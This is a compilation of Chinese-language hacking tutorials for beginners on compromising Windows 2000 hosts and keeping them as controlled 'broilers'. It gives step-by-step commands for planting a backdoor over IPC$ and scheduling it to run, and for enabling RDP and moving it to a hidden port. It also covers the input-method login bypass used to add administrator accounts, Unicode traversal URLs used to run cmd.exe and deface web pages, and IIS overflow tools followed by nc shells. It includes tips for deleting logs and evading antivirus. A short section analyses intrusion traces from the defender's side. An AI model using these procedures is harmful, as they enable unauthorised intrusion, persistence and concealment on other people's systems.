怎样从ipc$到开放3389到最后3389只为你服务

IPC扫描

获得共享列表

g f e h I

获得用户列表

029 1 2 Administrator (Admin) Guest IUSR_SERVER IWAM_SERVER TsInternetUser

猜解成功用户帐号 Administrator (Admin):(NULL)

随便找了一台做实验，先ipc$连上再说。
==========================================================================================
C://Documents and Settings//shanlu.XZGJDOMAIN>net use ////218.22.155.*//ipc$ "" /user:administrator
----------------连接成功！ 命令成功完成。

C://Documents and Settings//shanlu.XZGJDOMAIN>copy wollf.exe ////218.22.155.*//admin$
------------------------------拷贝wollf.exe到目标计算机的admin$目录
已复制     1 个文件。

C://Documents and Settings//shanlu.XZGJDOMAIN>copy hbulot.exe ////218.22.155.*//admin$
-----------------------------拷贝hbulot.exe到目标计算机的admin$目录
已复制     1 个文件。

C://Documents and Settings//shanlu.XZGJDOMAIN>net time ////218.22.155.*
////218.22.155.* 的当前时间是 2002/12/1 上午 06:37
命令成功完成。

C://Documents and Settings//shanlu.XZGJDOMAIN>at ////218.22.155.* 06:39 wollf.exe
新加了一项作业，其作业 ID = 1--指定wollf.exe在06:39运行
------------------------------------------------------------------------------------------
说明：
wollf.exe是一个后门程序，很多高手都喜欢nc或者winshell，不过我对他情有独钟！在这里我只介绍与本
文内容有关的命令参数，它的高级用法不做补充。
hbulot.exe是用于开启3389服务，如果不是server及以上版本，就不要运行了。因为pro版不能安装终端服务。
2分钟后......

==========================================================================================
C://Documents and Settings//shanlu.XZGJDOMAIN>wollf -connect 218.22.155.* 7614
"Wollf Remote Manager" v1.6
Code by wollf, http://www.xfocus.org
------------------------------------------------------------------------------------------
说明：
使用wollf连接时要注意wollf.exe要在当前目录，它的连接命令格式：wollf -connect IP 7614
7614是wollf开放的端口。如果显示如上，说明你已经连接成功，并具有管理员administrator权限。

==========================================================================================
[server@D://WINNT//system32]#dos

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
------------------------------------------------------------------------------------------
说明：
输入dos,你就会进入目标机的cmd下，这时同样具有administrator权限。

==========================================================================================
D://WINNT//system32>cd..
cd..

D://WINNT>dir h*.*
dir h*.*
驱动器 D 中的卷没有标签。
卷的序列号是 1CE5-2615

D://WINNT 的目录

2002-11-27 03:07   

     Help
2002-09-10 12:16        10,752 hh.exe
2002-10-01 08:29        24,576 HBULOT.exe
        2 个文件     35,328 字节
        1 个目录 9,049,604,096 可用字节

D://WINNT>hbulot
hbulot
------------------------------------------------------------------------------------------
说明：
因为我们把HBULOT.exe放到目标机的admin$下的，所以先找到它，以上是文件的存放位置。

==========================================================================================
D://WINNT>exit
exit

Command "DOS" succeed.

[server@D://WINNT//system32]#reboot

Command "REBOOT" succeed.

[server@D://WINNT//system32]#
Connection closed.
------------------------------------------------------------------------------------------
说明：
由dos退到wollf的连接模式下用exit命令，HBULOT.exe运行后需重新启动方可生效，这里wollf自带的REBOOT命令，执行过在5秒后你就会失去连接。启动完毕后检查一下3389端口是否开放，方法很多，superscan3扫一下。这时候你就可以登陆了。如果没有开放3389那就不是server及以上版本，就不要运行了。因为pro版不能安装终端服务。到这里，你已经拥有3389肉鸡了！但是会不会被别的入侵者发现呢？下面所教的就是怎么让3389只为你服务！我们现在使用的3389登陆器有两种版本，一种是2000/98，一种是XP。二者区别呢？前者使用的默认端口3389对目标，后者默认的也是3389端口，但是它还支持别的端口进行连接！所以呢......我们来修改3389的连接端口来躲过普通扫描器的扫描！修改方法如下：
修改服务器端的端口设置 ，注册表有2个地方需要修改。
[HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Control//Terminal Server//Wds//rdpwd//Tds//tcp] PortNumber值，默认是3389，修改成所希望的端口，比如1314
第二个地方： 
[HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Control//Terminal Server//WinStations//RDP-Tcp]PortNumber值，默认是3389，修改成所希望的端口，比如1314 
现在这样就可以了。重启系统吧。 
注意：事实上，只修改第二处也是可以的。另外，第二处的标准联结应该是 
[HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Control//Terminal Server//WinStations// 
表示具体的某个RDP-TCP连结。
重启过后，看看端口有没有改。
小技巧：修改注册表键值时，先选择10进制，输入你希望的端口数值，再选择16进制，系统会自动转换。

建立3389
建立批命令.包含以下信息
echo [Components] > c:/sql
echo TSEnable = on >> c:/sql
sysocmgr /i:c:/winnt/inf/sysoc.inf /u:c:/sql /q
用IPC传到对方机器后,net time得出对方时间然后at运行此批命令
五六分钟以后对方机器重起可3389登陆
以此类推,可以在有IPC账号情况下以批命令运行任何可运行的命令,如加账号,开各种服务等!
3389肉鸡深入讨论　
序言
很多菜鸟拥有了第一台肉鸡后，水平一日千里，功夫飙升。所以有肉鸡是菜鸟成为高手的 漫漫长路上的第一个目标。
本文将我个人的一些办法（可能很土）与大家分享。
方法一）安装服务
我知道很多人都有format 硬盘的坏习惯，我以前也有，现在彻底改邪归正了。
如果找到一台有漏洞的机器（我这里专指可以拿到权限的win2K机器），由于没有开现成的端口，而轻易黑掉，是很可惜的。他没有开，我们可以给他开嘛。

对于win2000，很多人进去都喜欢net start TermService，一般由于该服务被禁用，是开启不成功的，那么我们想一点别的办法。：）

我们会用Windows 2000下的Resource Kits中的一个工具instsrv创建一个服务，instsrv的用法如下，当然，你也可以用其他的工具来实现（如srvinstw，GUI方式的）。
C:/>instsrv
Installs and removes system services from NT
INSTSRV ( | REMOVE)
[-a ] [-p ]
Install service example:
INSTSRV MyService C:/MyDir/DiskService.Exe
-OR-
INSTSRV MyService C:/mailsrv/mailsrv.exe -a MYDOMAIN/joebob -p foo
Remove service example:
INSTSRV MyService REMOVE
大家现在明白了吧？
先instsrv TermService REMOVE
然后给他再装上终端服务instsrv Winlogonservice c:/winnt/system32/termsrv.exe
嘿嘿，只要c:/winnt/system32/termsrv.exe存在，就可以给他装上一个叫做Winlogonservice的服务，而且是自动启动，哈哈～～
不妨在送个reboot.exe给他，然后用at //xxx.xxx.xxx.xxx 23:30 reboot.exe
这样他重启过后我们就能连接他的3389了。：）

方法二）对于终端服务设置为已禁止的机器
使用win2000无人职守工具sysocmgr.exe:
echo [Components] > c:/bootlog.txt
echo TSEnabled = on >> c:/bootlog.txt
sysocmgr /i:c:/winnt/inf/sysoc.inf /u:c:/bootlog.txt /q
sysocmgr的用法请自己到命令行下输入 sysocmgr[回车] 看看帮助，写得很清楚，上面的参数大致不变；如果你不想对方马上重启，输入 /r 选项，拟制重启(防止被发现)：
sysocmgr /i:c:/winnt/inf/sysoc.inf /u:c:/bootlog.txt /q /r

方法三）修改对方服务设置或者直接修改注册表（成功率相对较低）
1、在regedit中菜单“注册表”－》“连接网络注册表”
HKEY_LOCAL_MACHINE－》SYSTEM－》CurrentControlSet－》Services－》Termservice
将start键值修改为2－》退出regedit
想办法让对方机器重启（reboot.exe很管用）
2、我的电脑－》管理－》服务－》Terminal Services－》属性－》自动－》确定－》启动Terminal Services（成功率不是很高）

进入肉鸡后，请大家帮助升级，打补丁，堵漏洞（肉鸡多半也是国内的嘛），然后她就会为你忠实服务了。
对于sa弱密码进入系统的菜鸟，记得到 开始－》程序－》mssql server->enterprise management->。。。。－》security->logins里面给自己加个帐户（不要是DBO，会有麻烦），当然权限和sa相同，然后修改sa密码(嘿嘿，独占，这样“她的眼里只有你”)。
======== 续 ＝＝＝＝＝
1）所谓“万能3389攻击”的具体攻击办法：

3389连接目标的时候，点击服务器地址栏，点击任务栏输入法，选择清华紫光（或者别的什么鸟输入法，只要能看帮助就行）；
连接到3389服务器，如果对方刚好有这个输入法，那么就用输入法漏洞利用方法一样（差别是有的，关键在：找到什么地方有“打开文件”或者“保存文件”对话框出现）；

2）漏洞存在的原因及解决思路：

鉴于第三方输入法都是系统及相关应用软件（SQL server 、IIS、补丁等）装好后才考虑的事情，这个帮助文件一般也不是放在%systemroot%/help下面，所以删除这个目录下面的win*是没有用的，必须到安装目录去删除.cnt或者*.hlp文件才行。
说得科学一点是这样：第三方软件设计缺陷导致系统出现漏洞；
说得玄乎一点就是系统打不打补丁都一样能黑。
由于第三方软件不在MS Service pack范围内，当然与sp 无关。

听着这两种表示方式，大家觉得那样比较好？
（我认为科学得态度是首要的，不要学李红痔故弄玄虚，把握事情本质才是我们追求的）

3）体验
这是输入法漏洞利用的延伸，我曾经用清华紫光的这个帮助里面的“添加打印机”（好像是）然后弹出的”保存文件“对话框内，找个可执行文件，右键点击－》“建立快捷方式”－》快捷方式“属性”＝》net user ......－》确定－》右键点击－》打开（也就是执行）
成功进入过一些机器。

4）题外话
另外，除非你运气特别好，否则比较难遇到，因为服务器上装东西的原则是：只要够用就行。

5）最后给想做“超级黑客”的朋友的建议：多动脑和手；嘴巴吃饭喝酒比较累，一定要让它多多休息。

3389入侵后实现上传下载的简单方法
　其实这是很简单的:
首先你必须要有一个主页空间,八要上传的文件先上传到主页,然后打开终端,连接服务器,
跳至url中http://主页/文件
如http://tnt168.51.net/sys.exe
然后会出现下载的页面,保存或运行,
实现下载是这样的:
现在浏览器中//ip/scripts/cmd.exe?/c+copy+目标文件 c:/inetpub/wwwroot/目标文件.zip
然后就可以实现下载了,~o~
但下载后怎么运行?很简单,改变她的属性:
察看--->文件夹选项--->察看--->将"隐藏已知的文件的扩展名"的勾去掉
再回到文件,将它重命名,改属性为原来的属性
如http://ip/cmd.zip(把cmd.exe改为了cmd.zip实现下载) 然后执行上面的步骤,改回cmd.exe就可以了!
这样我们就能实现上传下载了!我们把上载的文件改为一个不被病毒防火墙所查杀的木马(推荐木马信使tnt168.51.net/systtem.zip)
我们就能长期控制和知道她的密码了
具体的方法相信大家都知道了,我不再罗嗦了
(cmd.exe请改名为其他以夺过检查)
486 也跑 WIN2000 — WIN2000 输入法漏洞应用实例
你是否也曾有一台牛 B 一时的 486 呢？如果它老人家还健在，那么，别在多想，快快拍拍它身上的灰尘，让我们一同享受 WIN2000 带来的欢乐。

  最近有许多网友来信咨询 WIN2000 上输入法漏洞怎样利用，有多大价值。的确，初看这个漏洞属于本地漏洞，我们不可能为了用这个漏洞时跑到人家机房去试验，那也是不现实的。但大家却忽略了一个问题，就是 WIN2000 的远程共享功能。有许多粗心的网络管理员在安装 WIN2000 时会不加选择的安装全部组件，这样， WIN2000 的远程共享功能就成为一个合法的天然超级木马。

  具体怎样用呢？听我一一道来：

  我试验的机器为 486 DX2/100 ＋ 8M 内存＋ 512M ＋ WIN95 中文版＋ MODEM （呵呵，艰苦朴素是中华民族的传统美德）

1. 使用端口扫描工具。扫描一个网段内的 3389 端口。因为 WIN2000 的远程共享功能就是通过这个端口实现的。建议使用小榕编写的“流光 2001 ”＋“ IP 限制破解补丁”，这样你 就可以很容易迅速找到有远程共享的 WIN2000 主机。如图（一）

2. 使用“ WIN2000 终端”直接与目标 IP 进行连接。如图（二）

3. 出现登入界面时，会要求你输入密码。不知道密码不要紧，这时就可以应用 WIN2000 输入法漏洞了！输入 CTRL ＋ SHIFT 切换当前输入法到“智能 ABC ”，你可以通过“智能 ABC ”输入法的状态界面调出它的帮助系统。如图（三）用 MOUSE 单击帮助系统窗体左上角，在“ URL 转至：”中输入“ C ：”回车。如图（四）快看，右侧的帮助正文窗体中列出了对方 C 盘的目录。这时，你可以用 MOUSE 右击对方 C 盘文件夹，进行打开文件夹或启动资源管理器等操作，然后进入对方的 WINNT 主目录中下载 SAM ，（经实验某些版本 WIN2000 无法直接打开文件夹或启动资源管理器，但你仍然可以改变 C 盘或文件夹属性并设为共享。然后用 NET 命令下载对方的 SAM 密码文件）。如图（五）

4. 下面，你需要做的就是找一个破解 SAM 是软件，对刚下载的 SAM 进行穷举破解。

5. 一但密码破解成功后，恭喜你，那台 WIN2000 就归你用了！用“ WIN2000 终端”连入对方机器，你就可以尽情享受 WIN2000 的强大功能。在上面用流光跑跑 e － mail 密码，如果你有 128k 带宽的话，还可以看看 486 无力解码的 RM 或 DVD 。“爽”就一个字，我只说一次！

  漏洞的初步补救方案：因为此漏洞在 WIN98 ～ WIN2000 ＋ SP1 中各版本均存在，所以目前只有两个办法：

1. 不安装 WIN2000 远程共享功能

2. 删除“智能 ABC ”“郑码”等输入法，仅存英文和“微软智能拼音”

          关于 WIN2000 远程共享功能的扩展应用

  在誉儿本地的众多网吧中，大多数组网采用 WIN98 对等网＋ SYGATE 或 WINGATE 。

其成本大约是：     工作站：赛扬 533A ＋ 15 寸彩显＋ 64M 内存＋ 15G 硬盘＋ TNT2 显卡    

          3800 ～ 4000 元 / 台   ×   20 台   ＝ 80000 元 （选其中一台作服务器）

  而使用 WIN2000 远程共享功能组网

其成本大约是：   服务器一台：双奔三－ 800 、 512M 内存、 30G 硬盘、 WIN2000Server   15000 元

          工作站：奔腾－ 75 ＋ 512M 硬盘＋ 17 寸彩显（二手）＋ WIN95 2000 元 / 台× 20 ＝ 40000 元

          合计： 65000 元

  这样你一下就省了近 20 ％，偷着乐去吧！誉儿前些天就帮朋友作了一个这样的网吧。而且还在 Server 上装了个 NETSONIC 加速软件，由于 20 台工作站缓存集中，所以速度成倍提高。

优缺点比较：   WIN98                       WIN2000

    不稳定 ，易死机，难维护   稳定，不死机，使用活动目录技术，易维护，统一管理     网络功能单一           网络功能强大

由于使用 SYGATE 网关，       UDP 、 TCP 全部正常

OICQ 等软件无法使用 TCP 协  

议进行连接，不能进行“二        

人世界”“文件传输”等        

  可以玩单机游戏           不能玩单机游戏

  总结：

    事物都有两面性，上述例子就很明显，关键还是如何正确利用技术。用的好可以省钱省心；用的不好，就只能作为黑客们的肉鸡了。呵： p
WIN2000的输入法入侵
这是一种入侵简单，但造成用户损失后果最严重的一种入侵方法，严禁入侵国内主机！请慎用之！！！

（使用系统：WIN98/ME/2000/NT）这个方法对简体WIN2000有效。所以练习可以，但不要破坏。如果懂NET和IPC管道入侵的学者更容易学。

一 准备工具：WIN2000终端服务客户端程序，SQLEXEC程序，SUPERSCAN扫描器。

二 我们先运行SUPERSCAN扫描器，扫描器设置如图：

SUPERSCAN设置

注意：主要是改二个地方：一个IP地址，另一个端口改成3389.

三 我们扫出有3389端口打开的主机后，用SQLEXEC程序看看能不能创建新用户。如果不能创建就放弃，（当然还有另一种方法，下面再说。）如果我们能用NET USER创建用户，并把用户加到ADMINISTRATORS组的话，那恭喜你。准备登陆。

四 我们打开WIN2000 客户端程序。在最上面一项填入对方的IP。其他项不用改。按连接。过几秒后客户程序会打开一个窗口：

五 这个画面相信你很熟悉了吧，在使用者名称填入你刚才创建的用户名，密码栏填入你创建的密码然后按确定。呵呵，等一会（具体时间要看网速）就登陆到对方机器的窗口了。如图

登陆成功窗口

六 你可以看到对方主机的所有内容了，（怎么感觉有点象冰河？呵，冰河也没有这么直观呀）等于你强占了对方的机器，它的生杀大权就都在你手里了。可别干坏事啊。呵呵。进去后记住要删除入侵记录。把c:winnt/system32/logfiles/*.* 文件删除。别删错了呀。

上面的方法优点在于可以直接输入用户名和密码就能登陆，缺点是要用SQLEXEC一个一个试。还有一种方法：此方法适合于熟练掌握NET命令的学员。

我们用SUPERSCAN先对一个网段进行扫描，扫描端口设为3389，运行客户端连接管理器，将扫描到的任一地址加入到，设置好客户端连接管理器，然后与服务器连结。几秒钟后，屏幕上显示出WIN2000登录界面（如果发现是英文或繁体中文版，放弃，另换一个地址），用CTRL+SHIFT快速切换输入法，切换至全拼，这时在登录界面左下角将出现输入法状态条（如果没有出现，请耐心等待，因为对方的数据流传输还有一个过程）。用右键点击状态条上的微软徽标，弹出“帮助”（如果发现“帮助”呈灰色，放弃，因为对方很可能发现并已经补上了这个漏洞），打开“帮助”一栏中“操作指南”，在最上面的任务栏点击右键，会弹出一个菜单，打开“跳至URL”。此时将出现WIN2000的系统安装路径和要求我们填入的路径的空白栏。比如，该系统安装在Ｃ盘上，就在空白栏中填入“c:/winnt/system32”。然后按“确定”，于是我们就成功地绕过了身份验证，进入了系统的SYSTEM32目录。 现在我们要获得一个账号，成为系统的合法用户。在该目录下找到net.exe”，为net.exe”创建一个快捷方式，右键点击该快捷方式，在“属性”－>“目标”－>c:/winnt/system32/net.exe后面空一格，填入user 用户名 密码／add”，创建一个新账号，运行该快捷方式，此时你不会看到运行状态，但新用户已被激活。然后又修改该快捷方式，填入localgroup administrators 新用户 /add，将新用户变成系统管理员。大家可以用SQL和IPC管道命令进入了。
对win2000的攻击
对win2000的攻击（新手不要错过） 由于Win2000操作系统良好的网络功能，因此在因特网中有部分网站服务器开始使用的Win2000作为主操作系 统的。但由于该操作系统是一个多用户操作系统，黑客们为了在攻击中隐藏自己，往往会选择Win2000作为首先 攻击的对象。攻击win2000通常有余下比较简单的方法： 图形界面，远程登陆3389端口的攻击，下载superscan3.zip在地址：http://www.heibai.net/download/show.php?id=2 406在黑白上有。填上起始和停止的ip地址段，“所有端口从”3389到3389然后单击开始扫描，把扫描到的活动主机复制到剪贴 版。然后下载X-Scan-v1.3.zip在地址： http://www.heibai.net/download/show.php?id=1 486也是黑白上的工具注意下载后要解压缩。运行xscan_gui在基本设置里填人刚才扫描的活动主机（粘贴刚才到剪贴版上即可）在扫描模块里选择 sql-server弱口令和nt-server弱口令即可，等会我们要用到这，其他设置不变。当得到用户名和密码：202.120.5.2**的sql或win2000用户名和密码！哈哈现在好了，已经成功一大半了。 sql 密码sa （null） 去http://hdsafe.com/down/soft.asp?id=19下载sql 远程入侵工具sqlexec.exe 通过sql登陆到主机上，然后在主机上添加用户。具体步骤如下： （一）输入命令：net user heibao 1006 /add 回车添加一般用户（二）输入命令：net localgroup administrators heibao /add 回车将heibao添加到高级管理员组！ 去hdsafe.com下载清风火舞win2000登陆器，填人ip地址：202.120.2.2** 连接，填上用户名heibao和密码1006即可进入系统。 扫描到win2000用户名admini ，密码：password 即可用清风火舞win2000登陆器直接进入即可哈哈，到现在我们有自己的肉鸡了，在肉鸡上我们可以干自己想干的事情，当然不能太过火了。注意： 1.如果本文提供的网址不能下载，则可用google.com搜索即可。 2.终端最大连接数问题的解决，telnet进去，然后输入logoff 1 （1为id好号）

分析进入Win2000后留下的足迹
很多人对入侵Win2000系统很喜欢的吧，又有3389这样的界面型远程控制，还有这么多漏洞可以利用，而且关于入侵Win2000的文章又到处都是，方便啊。 不过，你知道，你到底留下了哪些足迹在系统中么？最近作了个入侵分析，发现了不少东西，当然，估计到入侵时间然后在查找文件就列出来了。我们在这里不分析来自FTP、HTTP的日志记录，因为这样来的入侵行为分析和防范比较容易，而通过帐号密码猜测进来的防范起来是比较麻烦的（安全配置相当OK的另说）。 1、系统的日志记录。 好的管理员应该尽可能地记录可以记录的东西，在本地安全策略中，对审核策略进行足够多的记录，你能发现，如果把所有的审核都选定的话（只要你不嫌多），一个帐号进行的操作访问的整个过程都能够完整记录下来了，一点不漏。 事件查看器里记录的内容是最多的了，从安全日志里面可以查看所有审核的事件。 我们看看一个帐号的登录/注销事件的记录： 会话从 winstation 中断连接: 用户名: guest 域: Refdom 登录 ID: (0x0,0x28445D9) 会话名称: Unknown 客户端名: GUDULOVER 客户端地址: 202.103.117.94 这是一个3389登录的事件，系统记录下了IP地址，机器名称以及使用的用户名。还是很齐全的吧。 这是一个详细追踪的记录： 已经创建新的过程: 新的过程 ID: 4269918848 映象文件名: /WINNT/system32/CMD.EXE 创建者过程 ID: 2168673888 用户名: Refdom$ 域: Refdom 登录 ID: (0x0,0x3E7) 这是使用localsystem来运行了cmd.exe的记录，呵呵，用本地系统帐号运行cmd.exe不是用net user还是什么（当然还能做很多事情）。 小心自己的日志记录太多，日志空间使用满，这样WIN就不再记录新的事件了，请在日志属性中选择按需要改写日志，这样可以记录新的事件，不过可能把需要分析的事件给改写了。 可惜的是，这里的记录实在是太显眼了，多半存活不了。 2、足够多的痕迹留在“Documents and Settings”目录里面 这个目录是所有帐号的足迹存放地，当然，从3389或者本机进入使用图形界面就会留下帐号目录来。我们来看看一个帐号的“Documents and Settings”目录里面有什么东西吧，首先查看所有文件和文件夹，不要隐藏任何东西。 “「开始」菜单”：当然是存放帐号自己的“开始”中的东西，这个里面的“启动”是个比较好东西哦。 “Application Data”：一些应用程序留下的数据啊、备份啊什么的东西，分析用处不怎么大。 “Cookies”：如果入侵者通过3389进来，还去浏览了网页，那么这里就存放着足够多的Cookie，让你能够知道他到底去了哪些地方。 “Local Settings”，这里也是一些临时数据的存放地，还有就是IE的脱机东东。说不定能发现很多好网站哦。 “Recent”：这个文件夹是隐藏的，不过里面存放的东西实在太多了，帐号访问的目录、文件一个一个都记录在案。使用了哪些东西，看了哪些文件，都能知道得清清楚楚。 “Templates”：存放临时文件的地方。 3、从黑客工具看 被人入侵了，那他一定会想办法获得administrator权限，得到了这个权限他就能为所欲为了，按照各种介绍的入侵教材，当然是放置其他扫描器做肉鸡、安装后门、删除日志……呵呵，这些扫描器都有足够的日志可以提供分析，还能帮自己白白收集一些肉鸡。而且从这些工具的日志（配置文件）里面也可以看出入侵者的意图以及水平等等。 也好，那流光来说吧，每次扫描的结果都写下来了，大家都可以看，不看白不看。 被安装后门、代理跳板（不是多级）是最好的了，谁能远程控制你做什么呢？我们当然可以从后门程序抓住入侵者的来历，从哪里传过来的连接，用嗅叹器就是了，当然，你甚至可以用一个非常有意思的文件名来伪装自己的木马，让他当回去使用，想玩大家一起玩啊。当然，从另外的3389肉鸡这样的控制来的入侵者还是只找到的他的肉鸡而已。（冒险，把他的肉鸡也搞定吧）

由于网上很多朋友问我怎么入侵别人的机器，所以整理了一些我认为容易学的漏洞入侵方法，希望能给初学者一些帮助，下面讲的内容很简单，高手就不用浪费时间看了，：）

（1） UNICODE漏洞入侵
“Uicode漏洞”是微软IIS的一个重大漏洞。2001年最热门漏洞之一。
第一步，运行RANGSCAN扫描器，会出现扫描窗口，在最上面有两个from的横框，这是让你填一段IP范围的。在第一个框里填入启始域（打个比方，比如你要扫192.168.0.1至192.168.0.255）那么你在第一个框里就填入192.168.0.1，在to 后面的框里填入192.168.0.255 意思就是扫192.168.0.0至192.168.0.255这段范围里有UNICODE漏洞的机器。接着在中间有一个添加的横框，是要填入内容的如：
/scripts/..%c0%af../winnt/system32/cmd.exe
这句话的意思是扫描有 %c0%af 漏洞的机器，对象一般是英文的WIN2000机。
我们把/scripts/..%c0%af../winnt/system32/cmd.exe填入框里，再按一下添加。再按“扫描”。就看到RANGSCAN开始扫了。这时就要看你选的IP范围有漏洞的机器多不多了，如果你选的IP范围好，呵，很快在扫描结果框里就会显示扫到的漏洞主机
如192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe
意思是192.168.0.111主机有 %c0%af 漏洞，
目标有了，我们马上打开浏览器。在网址栏里输入：
100.100.100.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:/ 回车
意思是查看机器里C盘的根目录。一般情况下，我们都可以在浏览器里看到类似如：
Directory of c:/
2002-03-13 03:47p 289 default.asp
2002-02-11 03:47p 289 default.htm
2002-03-09 04:35p
Documents and Settings
2002-02-11 03:47p 289 index.asp
2002-02-11 03:47p 289 index.htm
2002-05-08 05:19a
Inetpub
2002-01-19 10:37p
MSSQL7
2002-03-09 04:22p
Program Files
2002-01-23 06:21p
WINNT
4 File(s) 1,156 bytes
5 Dir(s) 2,461,421,568 bytes free
------------------------------
的目录列表。也会碰到看不到文件的空目录。
好，我们成功看到了机器里的C盘了。
我们在浏览器里输入：
192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+set 回车
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:

ALLUSERSPROFILE=C:/Documents and Settings/All Users
CommonProgramFiles=C:/Program Files/Common Files
COMPUTERNAME=ON
ComSpec=C:/WINNT/system32/cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=192.168.0.111
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98; Win 9x 4.90)
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTPS=off
INSTANCE_ID=1
LOCAL_ADDR=192.168.0.111
NUMBER_OF_PROCESSORS=1
Os2LibPath=C:/WINNT/system32/os2/dll;
OS=Windows_NT
Path=C:/WINNT/system32;C:/WINNT;C:/WINNT/System32/Wbem;C:/MSSQL7/BINN
PATH_TRANSLATED=c:/inetpub/wwwroot
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Fa
-----------------
哈，我们看到了机器设置内容了，我们找找，主要看PATH_TRANSLATED=c:/inetpub/wwwroot
意思是他的主页存放在c:/inetpub/wwwroot的目录里，知道就好办了。
我们用命令：
192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:/inetpub/wwwroot回车
我们就可以看到c:/inetpub/wwwroot目录里的文件了，一般都有default.asp, default.htm , index.htm, index.asp,等等。我们以目录里有index.asp做例子。
我们先要做的是把文件的只读属性解除掉，很多管理员都把文件设置只读。
我们用命令：
192.168.0.111/scripts/..%c0%af../winnt/system32/attrib.exe?%20-r%20-h%20c:/inetpub/wwwroot/index.asp 回车
当看到下面的英文
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
恭喜你，你可以改他的网页了。
----------------------------------------
但如果你看到下面的英文就不成功，只好换其他机器了。
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access denied - C:/inetpub/wwwroot/index.asp
-----------------------------
继续。现在用ECHO改网页的内容。
100.100.100.111/scripts/..%c0%af../winnt/system32/cmd".exe?/c+echo+网站有漏洞+> c:/inetpub/wwwroot/index.asp 回车
当看到
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
的提示，你已经改了他的网页了，呵呵，你想改成什么字也行。只要把命令中的中文换成你自己的中文就行了。

英文WIN2000
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:/
中文WIN2000
/scripts/..%c0%2f../winnt/system32/cmd.exe
/scripts/..%c1%1c../winnt/system32/cmd.exe
WIN NT4
/scripts/..%c1%9c../winnt/system32/cmd.exe
英文WIN2000
/scripts/..%c0%af../winnt/system32/cmd.exe
通用代码：/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:/

（2） Windows2000输入法漏洞
先用端口扫描器扫描开放3389的机器，然后用终端客户端程序进行连接，用CTRL+SHIFT快速切换输入法，切换至全拼，这时在登录界面左下角将出现输入法状态条，在输入法状态条上按鼠标右键。选择“帮助” —— “输入法指南” —— “选项”。（如果发现“帮助”呈灰色，放弃，因为对方很可能发现并已经补上了这个漏洞。）按右键，选择“跳转到URL”，输入：c:/winnt/system32在该目录下找到“net.exe”，为“net.exe”创建一个快捷方式，右键点击该快捷方式，在“属性” —“目标”—c:/winnt/system32/net.exe 后面空一格，填入“user guest /active :yes”。 点击“确定”（目的是，利用“net.exe”激活被禁止使用的guest账户）运行该快捷方式。（此时你不会看到运行状态，但guest用户已被激活。）然后重复操作上面的，在 “属性” —— “目标”—— c:/winnt/system32/net.exe 后面空一格，填入localgroup administrators guest /add（这一步骤目的是，利用“net.exe”将guest变成系统管理员。）再次登录终端服务器，以“guest”身份进入，此时guest已是系统管理员，已具备一切可执行权及一切操作权限。现在，我们可以像操作本地主机一样，控制对方系统。
（3） idq溢出漏洞
要用到3个程序，一个Snake IIS IDQ 溢出程序GUI版本，一个扫描器，还有NC。
首先扫描一台有IDQ漏洞的机器，然后设置Snake IIS IDQ 溢出程序，在被攻击IP地址后面写上对方的IP.端口号一般不需要改动，软件的默认绑定CMD.EXE的端口是813.不改了.用默认的，左面选择操作系统类型，随便选一个，我们选IIS5 English Win2k Sp0吧，点击IDQ溢出~~OK~~出现发送Shellcode成功的提示了，然后我们用NC来连接。
进入MS-DOS。进入“nc”的目录。然后：nc --v IP 813
c:/>nc -vv IP 813
IP: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [IP] 813 (?): connection refused
sent 0, rcvd 0: NOTSOCK
c:/>

看来没成功. 别灰心，在来一次，换用IIS5 English Win2k Sp1试试。
c:/>nc -vv IP 813
IP: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [IP] 813 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:/WINNT/system32>
哈哈，终于上来啦，你现在可是system权限，下面该怎么做就看你的啦。

（4）IDA溢出漏洞
所用程序：idahack
进入MS-DOS方式（假设idq.exe在c:/下）
c:/idahack.exe
运行参数：c:/idahack
chinese win2k : 1
chinese win2ksp1: 2
chinese win2ksp2: 3
english win2k : 4
english win2ksp1: 5
english win2ksp2: 6
japanese win2k : 7
japanese win2ksp1: 8
japanese win2ksp2: 9
korea win2k : 10
korea win2ksp1: 11
korea win2ksp2: 12
chinese nt sp5 : 13
chinese nt sp6 : 14

c:/idahack 127.0.0.1 80 1 80
connecting...
sending...
Now you can telnet to 80 port
Good luck ?;
好，现在你可以telnet它的80端口了，我们用NC来连接。
C:/nc 127.0.0.1 80

Microsoft Windows 2000 [Version 5.00.2195]
（C）版权所有 1985-1998 Microsoft Corp
C:/WINNT/system32>
OK，现在我们现在上来了，也可IDQ一样是SYSTEN权限，尽情的玩吧。

（5）.printer漏洞
这个漏洞，我们用两个程序来入侵。iis5hack和nc。
C:/>iis5hack
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack,

usage: D:/IIS5HACK.EXE
用法: D:/IIS5HACK <溢出的主机> <主机的端口> <主机的类型> <溢出的端口>
chinese edition:   0
chinese edition, sp1: 1
english edition:   2
english edition, sp1: 3
